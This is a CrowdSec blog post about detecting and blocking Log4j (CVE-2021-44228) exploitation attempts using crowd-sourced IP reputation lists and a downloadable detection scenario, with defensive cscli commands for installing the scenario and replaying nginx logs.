This report includes real-time data reported by the CrowdSec Community. IPs originating from known public scanners are discarded from this report (mostly IPs from Germany) but are included in our full IP list available in this Gist.
Join the CrowdSec community and start reporting & remediating rogue IPs scanning for the Log4j vulnerabilities and many more. Get it here!
CrowdSec helps detect and mitigate Log4j exploits
The Log4j vulnerability impacts countless organizations. CrowdSec released a scenario that will help detect and block exploitation attempts of the vulnerability. This new scenario can be directly downloaded from our Hub and installed in a blink of an eye. Check this quick video to see the plugin in action:
As CrowdSec is all about crowd power and given the size of our quickly growing network, we are collecting a lot of IP addresses attempting to exploit this vulnerability. You can check the list here. It is updated several times a day and, needless to say, you should block the ones that are “validated”.
Those IP addresses were curated by our consensus algorithm, meaning they had a lot of votes against them coming from our user network. The ones in “not enough data” state are highly suspicious but can still contain some false positives, up to you. The ones categorized as “benign” are IPs used by people that usually are on the good side of the fence, they probably scan to help and not to undermine.
Alternatively, you can use our replay mode to analyze your servers’ logs to check if exploitation of Log4j was attempted at your place, by who and when, using the appropriate scenario and the below command line:
sudo cscli hub update sudo cscli scenarios install crowdsecurity/apache_log4j2_cve-2021-44228 sudo systemctl reload crowdsec # sudo crowdsec --dsn "file://<log_file_path>" -no-api --type <log_type> sudo crowdsec --dsn "file:///var/log/nginx/access.log" -no-api --type nginx sudo cscli alerts list --scenario crowdsecurity/apache_log4j2_cve-2021-44228